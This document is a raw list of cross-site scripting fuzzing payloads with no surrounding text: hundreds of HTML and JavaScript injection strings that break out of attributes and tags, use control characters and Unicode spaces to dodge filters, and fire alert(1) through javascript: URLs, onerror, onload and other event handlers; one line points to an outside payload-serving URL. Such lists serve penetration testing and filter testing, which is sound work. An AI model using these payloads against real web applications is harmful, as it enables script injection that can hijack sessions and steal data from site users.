"><a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
"><a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
'><a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
`"'><img src=x onerror=javascript:alert(&#039;1&#039;)>
"><img src=x onerror=javascript:alert(&#039;1&#039;)>
'><img src=x onerror=javascript:alert(&#039;1&#039;)>
<img src=x onerror=javascript:alert(&#039;1&#039;)>
"><img src=x onerror=javascript:alert(&#039;1&#039;)>
'><img src=x onerror=javascript:alert(&#039;1&#039;)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
'><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
'><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
'><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
'><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
'><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
'><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
'><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
'><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
"><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
'><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
'><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
<img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
'><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
<img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
'><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
<img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
'><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
<img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
'><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
<img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
'><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
<img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
'><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
<img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
'><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
<img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
"><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
'><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
"><script\x2F>javascript:alert(1)</script>
'><script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
"><script\x20>javascript:alert(1)</script>
'><script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
"><script\x0D>javascript:alert(1)</script>
'><script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
"><script\x0A>javascript:alert(1)</script>
'><script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
"><script\x0C>javascript:alert(1)</script>
'><script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
"><script\x00>javascript:alert(1)</script>
'><script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
"><script\x09>javascript:alert(1)</script>
'><script\x09>javascript:alert(1)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
</ScrIpt><script>javascript:alert(1)<\x00/script>
"><script>javascript:alert(1)<\x00/script>
</ScrIpt><script>javascript:alert(1)<\x00/script>
'><script>javascript:alert(1)<\x00/script>
</ScrIpt><script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
"><img src=# onerror\x3D"javascript:alert(1)" >
'><img src=# onerror\x3D"javascript:alert(1)" >
<video poster=javascript:javascript:alert(1)//
"><video poster=javascript:javascript:alert(1)//
'><video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
"><body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
'><body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
"><form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
'><form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
"><video><source onerror="javascript:javascript:alert(1)">
'><video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
"><video onerror="javascript:javascript:alert(1)"><source>
'><video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
"><form><button formaction="javascript:javascript:alert(1)">X
'><form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
"><body oninput=javascript:alert(1)><input autofocus>
'><body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://8pwn.com/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
"><math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://8pwn.com/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
'><math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://8pwn.com/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
"><frameset onload=javascript:alert(1)>
'><frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
"><table background="javascript:javascript:alert(1)">
'><table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
"><!--<img src="--><img src=x onerror=javascript:alert(1)//">
'><!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
"><comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
'><comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
"><![><img src="]><img src=x onerror=javascript:alert(1)//">
'><![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
"><style><img src="</style><img src=x onerror=javascript:alert(1)//">
'><style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
"><li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
'><li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>
"><head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>
'><head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
"><SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
'><SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<object data="data:text/html;base64,%(base64)s">
"><object data="data:text/html;base64,%(base64)s">
'><object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
"><embed src="data:text/html;base64,%(base64)s">
'><embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>0
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
"><div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
'><div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
"><x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
'><x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
"><embed src="javascript:alert(1)">
'><embed src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
"><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
'><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
"><? foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
'><? foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
"><! foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
'><! foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
"></ foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
'></ foo="><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>'>">
"><? foo="><x foo='?><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>'>">
'><? foo="><x foo='?><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
"><! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
'><! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
"><% foo><x foo="%><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
'><% foo><x foo="%><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
"><div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
'><div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
"><img \x00src=x onerror="alert(1)">
'><img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
"><img \x47src=x onerror="javascript:alert(1)">
'><img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
"><img \x11src=x onerror="javascript:alert(1)">
'><img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
"><img \x12src=x onerror="javascript:alert(1)">
'><img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
"><img\x47src=x onerror="javascript:alert(1)">
'><img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
"><img\x10src=x onerror="javascript:alert(1)">
'><img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
"><img\x13src=x onerror="javascript:alert(1)">
'><img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
"><img\x32src=x onerror="javascript:alert(1)">
'><img\x32src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
"><img\x11src=x onerror="javascript:alert(1)">
'><img\x11src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
"><img \x34src=x onerror="javascript:alert(1)">
'><img \x34src=x onerror="javascript:alert(1)">
